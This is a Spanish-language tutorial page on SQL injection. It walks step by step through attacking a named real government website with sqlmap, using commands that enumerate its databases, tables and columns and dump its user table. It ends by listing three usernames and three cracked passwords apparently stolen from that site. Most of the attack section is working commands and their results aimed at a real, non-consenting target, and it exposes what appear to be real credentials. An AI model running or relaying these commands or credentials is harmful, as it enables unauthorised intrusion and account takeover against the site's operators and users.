Logo Studenta

Errores de SQL

¡Estudia con miles de materiales!

Vista previa del material en texto

Errores de SQL 
¿Qué es un error de SQL? 
Es un error de sintaxis de una página web la cual nos permite penetrarla mediante una 
inyección de SQL, la cual es muy provechada para tener acceso a toda la base de datos de la 
web afectada con dicho ataque 
Este error lo podemos encontrar mediante las conocidas Dork de Google que son las más 
usadas para hallar este tipo de errores o utilizando un Scanner de vulnerabilidades web la cual 
es un método profesional de buscar diferentes tipos de errores. 
Las herramientas más conocida para penetrar las base de datos de una web son: 
Sqlmap 
Havij 
Webcruiser 
Acunetix 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
Aprendiendo SQLMAP 
 
Primero buscamos una web " Vulnerable por Ejemplo” 
http://www.fonep.gob.ve/noticias.php Como verán dicha web se ve normal a simple vista pero no es asi, 
Pues hay un parámetro inyectable " Noticias.php?id=195” 
 
http://www.fonep.gob.ve/noticias.php?id=195 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
Como nos Damos cuenta que tiene una vulnerabilidad esta web? , pues es sencillo las vulnerabilidades 
son Bug que son Errores de Fuente que pueden ser Vulnerables a una penetración 
 
http://www.fonep.gob.ve/noticias.php?id=195 >> ' << le agregaremos esta comilla, Así Ejemplo 
http://www.fonep.gob.ve/noticias.php?id='195 
 
 
 
 
 
 
 
http://img856.imageshack.us/img856/7529/17884101.png
 
 
Miren Como la web nos vota todos los Errores del SQL 
 
 
 
 
 
 
 
 
 
 
 
 
Ahora Sabemos que la Web Esta 100 % Vulnerable Ahora La Inyectaremos Mediante " SqlMap” 
 
1 - Abrimos SqlMapsaldra sus Toolz , en la terminal podemos lo siente 
 
./sqlmap.py -u http://www.fonep.gob.ve/ noticias.php?id=195 --dbs 
 
 
 
 
 
 
 
 
 
 
 
http://img571.imageshack.us/img571/177/sano.png
Como Vieron nos votó 2 Data Base, La opcional es Information_schema " lo que nos interesa es Esta " 
penof_cms” 
Ahora Pondremos Esto 
./sqlmap.py -u http://www.fonep.gob.ve/ noticias.php?id=195 --dbs -D penof_cms–tables 
 
 
 
 
 
 
 
 
 
Como ven Nos Votó 20 Tablas " las Cual lo que nos interesa es el usuario " justamente en esa web Esta 
a Simple Vista " fonep_usuarios " Ahora Pondremos Esto 
./sqlmap.py -u http://www.fonep.gob.ve/ noticias.php?id=195 -D penof_cms -T fonep_usuarios–
columns 
 
 
 
 
 
 
 
 
Como verán nos votó 9 Columnas Entraremos a " id_usuarios " 
 
 
 Pondremos esto 
./sqlmap.py -u http://www.fonep.gob.ve/ noticias.php?id=195 -D penof_cms -T fonep_usuarios -C 
nombre_usuarios --dump 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
Como vemos los usuarios son: 
-Ernesto 
-Luis 
-Sergio 
 
 
 
http://img534.imageshack.us/img534/745/77592636.png
 
 
 
Ahora sacaremos la password de esas ID pondremos Esto 
 
./sqlmap.py -u http://www.fonep.gob.ve/ noticias.php?id=195 -D penof_cms -T fonep_usuarios -C 
clave_usuarios --dump 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
Como Verán Nos Vota 3 Claves, " Pero Están Encriptados ^^ " Para Ello Necesitamos Desencryptarlas 
Como esta en Extensión MD5 Podemos Desencryptarlas En Esta Web: 
 
http://www.md5decrypter.co.uk/ 
 
Las Claves Son: 
 
3sert 
 
54321abub 
 
resres

Continuar navegando